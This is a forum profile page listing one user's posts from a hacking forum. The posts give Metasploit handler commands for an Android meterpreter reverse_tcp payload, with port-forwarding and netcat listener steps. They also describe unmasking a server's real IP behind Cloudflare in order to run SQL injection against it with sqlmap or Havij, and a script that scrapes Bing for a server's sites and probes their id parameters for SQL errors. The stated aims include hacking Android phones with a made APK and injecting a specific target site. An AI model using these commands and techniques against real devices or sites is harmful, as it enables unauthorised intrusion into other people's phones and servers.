0o0michael0o0
-
Posts
13 -
Posts posted by 0o0michael0o0
-
-
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 24000
exploit -j
make sure that u have the port 24000 open on your router and link it to ur internal ip address
type in terminal nc -lvp 24000
and check if ur port is open through this site http://www.canyouseeme.org/
if u get a connection from this site that means that all is good with u
that shall work fine
and if u want to use a dynamic dns
-
use Burp Suite and check the post data, who knows, maybe u can inject the post data
-
If you can de-cloak the server's IP, or find it through other means such as whois archives or netcraft history, then you can point your hosts file at the real IP and then run your attacks. Doesn't mean the exploits work, which would still require a vulnerable version of SQL software and/or accepting unsanitized data input that you can manipulate. One of the quickest checks is replacing www.somesite.com with direct.somesite.com or direct-connect.somesite.com. These often expose the domain's real IP, as well as brute forcing subdomains like mail.domain.com, or even ftp.domain.com
thnx digip, actually the site is very well protected and i tried to enumerate the dns with more than one method but i got a question, if i get the real ip of the server, how can i make the sqlmap or havij for example use the real ip ?? i know that if i get the user of the site, i can do it like that http://127.0.0.0/~/user/etc
but what if i didn't get the user of the site ? how can i inject the site after getting the real ip ? thnx in advance
-
there is a payload in metasploit make apk and hack the android
android/meterpreter/reverse_tcp
-
yeah sure i just thought it might be useful to share with you that script cause it works fine with me.
-
yeah sure i know but i didn't hack the server, i'm just trying to explain my point :)
i will try to refine it, and plz u can edit my comments with the site and delete it for me :)
thnx
-
i know it's not perfect, the script is simply searching for sql error for ex
ruby mick.rb 127.0.0.1 id
u will get that result -
nooo
ok try that i know that this server is vulnerable to sql and u will understand what i mean :)
ruby mick.rb 127.0.0.1 id
-
the script simply goes to bing.com and writes in the search ip:127.0.0.1 so it extracts the server sites by that method
then it looks for sql error for example .php?id=1 ' it puts the ' for all the id found in the server and if it found any error will tell u that the site is vulnerable :)
-
sorry guys i deleted the script to refine it
-
i'm asking cause i had that problem before and i wonder is there a method to make the sql injection while the cloudflare is on
-
i wonder is there any method to make sql injection while cloudflare firewall protecting the server !! ?
how to bypass it ?
thnx in advance.
sql and cloudflare
in Questions
Posted
i had that problem before. i bypassed the cloudflare and i get the true ip address for the target
now what to do next to inject the target site with sql for example ?!!